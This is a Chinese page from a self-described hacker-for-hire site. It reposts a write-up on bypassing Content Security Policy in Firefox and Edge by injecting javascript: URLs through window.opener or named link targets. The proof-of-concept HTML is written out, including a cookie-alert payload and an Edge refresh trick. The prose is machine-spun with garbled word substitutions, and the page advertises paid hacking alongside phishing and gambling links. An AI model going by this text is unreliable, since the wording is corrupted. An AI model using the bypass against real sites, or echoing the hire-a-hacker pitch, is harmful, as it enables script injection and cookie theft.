找黑客平台

Firefox与Edge的dom策略导致的csp bypass问题-黑客接单平台

访客5年前黑客工具1157
在2019年对csp研讨过一阵,发现能够经过其他的dom向存在CSP的dom注入javascript协议,来到达绕过CSP的安全防护。 众所周知,CSP(内容安全战略)有两种 *** 来设置,一种是经过浏览器器呼应头,如下: Content-Security-Policy:sc-src 'self' https://apis.google.com 还有一种便是经过标签进行设置,如下: meta http-equiv="Content-Security-Policy" content="sc-src 'none'"> 我发现这存在一个问题,假如某页面设置了CSP,而同源下其他页面不做CSP防护的话,黑客能够使用opener和target目标来对存在CSP的页面做一个进犯。不了解这两个目标的同学能够参阅p牛的target进犯的介绍以及我在17年投稿的那儿文章。 回到正题,以opener为例,为此咱们创立两个进犯文件,go.html与attack.html html> head> title>CSP Testtitle> meta http-equiv="Content-Security-Policy" content="script-src 'none'"> head> body> a href="./attack.html" target="_Blank">csp_let's_goa> script>alert(location.href);script> body> html> html> head> title> csp gotitle> head> body> script>parent.window.opener.location = "javascript:alert(location.href);"script> body> html> 把两个文件放在一个目录下,你会发现,go.html由于设置了CSP,他的 *** 代码不能答应。可是假如在Firefox中点击了csp_let’s_go, *** 就会履行,那是由于Firefox对该目标没有做防护。 而这在Chrome、Edge、Safiri中是不被答应的 便是这样,经过同源战略答应注入js,绕过了CSP的约束,相同的能够使用target来进行,这将分为两个html文件,go.html与target.html html> head>meta charset="utf-8">head> body> a href="./target.html" target="baidu" id="baidu" onclick="return start()">click mea> script> function start() { setInterval(function() { baidu.href="javascript:alert(location.href);"; baidu.click(); }, 5000); } script> body> html> html> head> title>CSP Testtitle> meta http-equiv="Content-Security-Policy" content="script-src 'none'"> head> body> csp bypass body> html> 相同的,这能够绕过火狐的CSP战略 关于这两个缝隙火狐给予了确认,火狐的回复是: On the one hand this is injecting a javascript URL into the other document, which ought to be blocked. On the other hand it’s hard to get too excited because parent.window.opener.alert(location.href) would be perfectly valid — the script is being run by a context that allows it, manipulating a DOM it’s allowed to by the same-origin policy. Edge Bug导致存在相同的问题 发现这个问题是由于在Edge测验如上代码的时分我发现我的系统资源CPU和内存被Edge占用了很高,所以我打开了调试台,看到了如下状况。 go.html一向向target.html抛出javascript协议,可是target由于CSP战略不断回绝,go.html就会将被回绝的恳求从头恳求一次,在加上时刻函数累加上的恳求,这儿成指数增加,导致了系统资源被耗尽。 在这种状况下对页面进行改写,能够绕过CSP: 当然这种状况下要用户自动去改写页面或许对DOM进行操作,咱们能够模仿改写来看到这个Bug: html> head> title>CSP Testtitle> meta http-equiv="Content-Security-Policy" content="script-src 'none'"> head> body> a href="./attack.html" target="_Blank">csp_let's_goa> script>alert(document.cookie);script> meta http-equiv="Refresh" content="1" /> body> html> html> head> title> csp gotitle> head>[1][2]黑客接单网
标签: 黑客接单网诚信找黑客平台
返回列表

上一篇:网站上赌博通过支付宝付款输了好多钱能不能把钱要回来

下一篇:网络赌博存在系统卡单吗

相关文章

钓鱼攻击姿势老套,不明真相还是上当-黑客接单平台

近来,深服气安全团队捕获到一同高度个性化的垂钓进犯事情,进犯者针对用户企业假造了多份带有专业内容的进犯文档,经过邮件发送到方针邮箱,妄图诱导用户翻开附件中的文档。 经安全专家剖析,该文档其实为带有缝隙...

下一代网络钓鱼技术——滥用Azure信息保护功能-黑客接单平台

在这篇文章中,咱们将从攻击者的视点介绍怎么运用Azure信息维护(Azure Information Protection,AIP)来改善网络垂钓技能。这个主意是在一次测验作业进程中发生的,其时我正在...

登录框之特殊考虑:来自客户端的诈骗

0×01 前语 前几天刚见人发了一个登录框引发的血案,而惯例的爆炸有风控和各种反常验证码,或许大型的电商都会用SSO完成登录,密码找回逻辑看似天衣无缝,又或许选用第三方的Oauth授权。往往这些惯例的...

我是怎么绕过Uber的CSP防护成功XSS的?

咱们好!在开端正式的内容之前,请答应我做个简略的毛遂自荐。首要,我要阐明的是我不是什么安全研究人员/安全工程师,切当的来说我是一名安全的爱好者,这始于两年前的Uber。我喜爱触摸新的事物,而且每天都在...

HTTP 的内容安全策略(CSP)

 本文介绍的是W3C的Content Security Policy,简称CSP。望文生义,这个规范与内容安全有关,首要是用来界说页面能够加载哪些资源,削减XSS的发作。 Chrome扩展现已引进了...

Apple iCloud帐户的破解与保护攻防战-黑客接单平台

不管你是履行桌面仍是云取证,云端数据都将成为越来越重要依据来历,而且有时是仅有依据来历。即便你不从事取证作业,云拜访也能够协助你拜访已删去或以其他办法无法拜访的数据。 与智能手机或受暗码维护的桌面相似...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.